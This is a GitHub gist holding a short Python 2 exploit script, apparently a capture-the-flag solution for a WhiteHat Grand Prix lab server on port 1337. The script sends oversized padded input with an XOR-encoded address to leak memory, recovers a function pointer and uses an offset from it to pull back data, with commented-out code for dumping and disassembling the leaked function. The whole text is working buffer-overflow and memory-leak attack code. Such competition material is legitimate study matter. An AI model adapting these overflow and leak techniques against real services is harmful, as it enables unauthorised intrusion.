Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created October 28, 2015 02:48
Show Gist options
  • Save peternguyen93/e187ad6cee83346298ce to your computer and use it in GitHub Desktop.
Save peternguyen93/e187ad6cee83346298ce to your computer and use it in GitHub Desktop.
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
from capstone import *
p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337)
def xor(msg):
data = ''
for c in msg:
data += chr(ord(c) ^ 0xc3)
return data
def exploit():
p.connect()
p.read_until('Welcome to exhor server\n')
l = 256 + 0xc + 8
i = 0
# raw_input('Debug>')
p.send('A'*l + p.pack(0x0804A01C ^ 0xc3c3c3c3) + '\x00\n')
data = p.recv(1024)
make_flag = p.unpack(data[l + 4:l + 8])
tmp = make_flag
p.send('A'*l + p.pack((make_flag + 7156) ^ 0xc3c3c3c3) + '\x00\n')
data = p.recv(1024)
print repr(data)
# print repr(data)
# make_flag_func = ''
# while 1:
# print hex(make_flag)
# p.send('A'*l + p.pack(make_flag ^ 0xc3c3c3c3) + '\x00\n')
# data = p.recv(1024)
# leak = data[l+4:-1]
# if len(leak) == 0:
# make_flag_func += '\x00'
# make_flag += 1
# else:
# make_flag_func += leak
# make_flag += len(make_flag_func)
# print repr(make_flag_func)
# if '\x00'*10 in make_flag_func:
# break
# md = Cs(CS_ARCH_X86, CS_MODE_32)
# for i in md.disasm(make_flag_func, tmp):
# print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
# time.sleep(1)
# p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment